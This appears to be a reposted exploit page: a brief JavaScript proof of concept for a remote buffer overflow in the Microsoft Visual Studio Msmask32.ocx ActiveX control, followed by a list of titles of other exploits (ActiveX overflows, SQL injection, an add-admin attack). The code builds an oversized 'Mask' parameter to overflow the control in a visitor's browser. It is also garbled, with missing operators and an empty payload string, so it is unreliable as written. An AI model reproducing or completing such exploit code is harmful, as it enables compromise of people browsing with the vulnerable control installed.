var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape("");}
document.write(body buf body1);
【Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC】相关文章:
★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit
★ BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
★ Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
★ Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit
★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit
★ PPMate PPMedia Class ActiveX Control Buffer Overflow PoC
★ BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution
★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability
★ Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit